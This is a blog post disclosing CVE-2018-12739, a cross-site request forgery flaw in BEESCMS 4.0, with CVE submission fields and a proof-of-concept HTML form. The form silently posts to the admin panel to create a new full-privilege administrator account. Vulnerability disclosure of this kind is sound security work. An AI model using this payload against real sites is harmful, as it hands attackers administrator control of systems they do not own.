CVE-2018-12739:BEESCMS_V4.0_CSRF

> ------------------------------------------
CVE-2018-12739
> [Discoverer]
> Bay0net from JZXTSEC

> ------------------------------------------

> [Suggested description]
> In BEESCMS 4.0, CSRF allows administrators to be added arbitrarily,

> ------------------------------------------

> [Vulnerability Type]
> Cross Site Request Forgery (CSRF)

> ------------------------------------------

> [Vendor of Product]
http://www.beescms.com/

> ------------------------------------------

> [Affected Product Code Base]
> BEESCMS - V4.0

> ------------------------------------------

> [Affected Component]
> After the administrator logged in, open the following page,which will add administrators.
https://www.cnblogs.com/v1vvwv/p/9226389.html

> ------------------------------------------

> [Attack Type]
> Remote

> ------------------------------------------

> [Impact Code execution]
> true

> ------------------------------------------

> [Impact Escalation of Privileges]
> true

> ------------------------------------------

> [Attack Vectors]
https://www.cnblogs.com/v1vvwv/p/9226389.html

> ------------------------------------------

> [Reference]
https://www.cnblogs.com/v1vvwv/p/9226389.html

> ------------------------------------------

> [Has vendor confirmed or acknowledged the vulnerability?]
> true

> ------------------------------------------

A CSRF vulnerability exists in BEESCMS_V4.0: The administrator can be added arbitrarily.

payload

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/beescms/admin/admin_admin.php?nav=list_admin_user&admin_p_nav=user" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="admin_name" value="test1" />
      <input type="hidden" name="admin_password" value="test1" />
      <input type="hidden" name="admin_password2" value="test1" />
      <input type="hidden" name="admin_nich" value="test1" />
      <input type="hidden" name="purview" value="1" />
      <input type="hidden" name="admin_admin" value="" />
      <input type="hidden" name="admin_mail" value="" />
      <input type="hidden" name="admin_tel" value="" />
      <input type="hidden" name="is_disable" value="0" />
      <input type="hidden" name="action" value="save_admin" />
      <input type="hidden" name="submit" value="确定" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

 

posted @ 2018-06-25 21:30 Bay0net 阅读(...) 评论(...) 编辑 收藏